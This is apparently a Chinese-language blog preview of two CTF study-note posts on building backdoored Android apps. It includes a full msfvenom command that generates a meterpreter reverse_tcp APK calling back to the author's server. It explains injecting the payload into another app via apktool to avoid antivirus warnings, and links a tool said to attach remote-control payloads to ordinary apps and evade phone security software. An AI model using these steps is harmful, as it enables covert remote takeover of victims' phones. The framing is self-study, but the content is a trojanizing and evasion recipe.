CTF学习笔记(大学篇)07 —— 手动注入msf到指定的程序
填坑回,因为之前在CTF学习笔记(大学篇)05 —— 通过msfconsole和520apkhook创建带有后门程序的安卓程序 | GamerNoTitle (bili33.top)这篇文章里面说有时间就写,然后写我们CTF俱乐部学期总结的时候就顺带讲了这个,所以就填了个坑
首先要生成带有后门程序的apk文件
1msfvenom -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=5555 R > pentestlab.apk
这里的host我实际上填的是我的公网服务器的IP地址,生成以后,如果直接安装,手机是肯定会报毒的(特别是装的国产定制ROM如MIUI、COLOROS之类的),这个时候就要把我们的后门程序注入到其他的软件里面去
(装上了会像右边这个图标这样,啥也没有,而且点开除了打开了后门也不会有什么反应)
然后我们反编译一下软件,用Linux(可能会)自带的apktool(如果没有请直走右转Github)
1234567891011121314┌──(gamernotitle㉿kali-vmware)-[ ...
CTF学习笔记(大学篇)05 —— 通过msfconsole和520apkhook创建带有后门程序的安卓程序
本文所用项目链接
ba0gu0/520apkhook: 把msf生成的安卓远控附加进普通的app中,并进行加固隐藏特征。可以绕过常见的手机安全管家。 (github.com)
在Ubuntu安装Msfvenom本来我想着能不能通过apt安装的,毕竟也是个软件包嘛(Kali就带了),然后我尝试运行
1sudo apt install msfvenom -y
结果告诉我找不到,只好求助于万能的Bing
首先我们需要把下面的这些内容保存到一个文件中(文件名随意)
1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889909192939495969798991001011021031041051061071081091101111121131141151161171181191201211221231 ...